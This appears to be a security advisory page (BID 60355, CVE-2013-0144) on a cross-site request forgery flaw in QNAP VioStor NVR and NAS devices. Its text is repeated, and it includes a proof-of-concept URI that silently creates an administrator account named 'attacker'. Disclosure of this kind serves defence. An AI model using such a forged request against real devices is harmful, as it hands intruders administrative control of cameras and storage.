QNAP VioStor NVR and QNAP NAS Cross Site Request Forgery Vulnerability
BID:60355
Info
QNAP VioStor NVR and QNAP NAS Cross Site Request Forgery Vulnerability
| Bugtraq ID: | 60355 |
| Class: | Design Error |
| CVE: |
CVE-2013-0144 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 05 2013 12:00AM |
| Updated: | Jun 05 2013 12:00AM |
| Credit: | Tim Herres and David Elze of Daimler TSS |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
QNAP VioStor NVR and QNAP NAS Cross Site Request Forgery Vulnerability
QNAP VioStor NVR and QNAP NAS are prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
The following are vulnerable:
QNAP VioStor NVR running firmware 4.0.3.
QNAP NAS
QNAP VioStor NVR and QNAP NAS are prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
The following are vulnerable:
QNAP VioStor NVR running firmware 4.0.3.
QNAP NAS
Exploit / POC
QNAP VioStor NVR and QNAP NAS Cross Site Request Forgery Vulnerability
To exploit this issue an attacker must entice an unsuspecting victim to open a malicious URI.
The following example URI is available:
http://www.example.com/cgi-bin/create_user.cgi?OK=&function=USER&subfun=NEW&USERNAME=&NAME=attacker&PASSWD=12345&VERIFY=12345&create_user_list=admin&PTZ1=on&Audio1=on&PTZ2=on&Audio2=on&PTZ3=on&Audio3=on&PTZ4=on&Audio4=on
To exploit this issue an attacker must entice an unsuspecting victim to open a malicious URI.
The following example URI is available:
http://www.example.com/cgi-bin/create_user.cgi?OK=&function=USER&subfun=NEW&USERNAME=&NAME=attacker&PASSWD=12345&VERIFY=12345&create_user_list=admin&PTZ1=on&Audio1=on&PTZ2=on&Audio2=on&PTZ3=on&Audio3=on&PTZ4=on&Audio4=on
Solution / Fix
QNAP VioStor NVR and QNAP NAS Cross Site Request Forgery Vulnerability
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].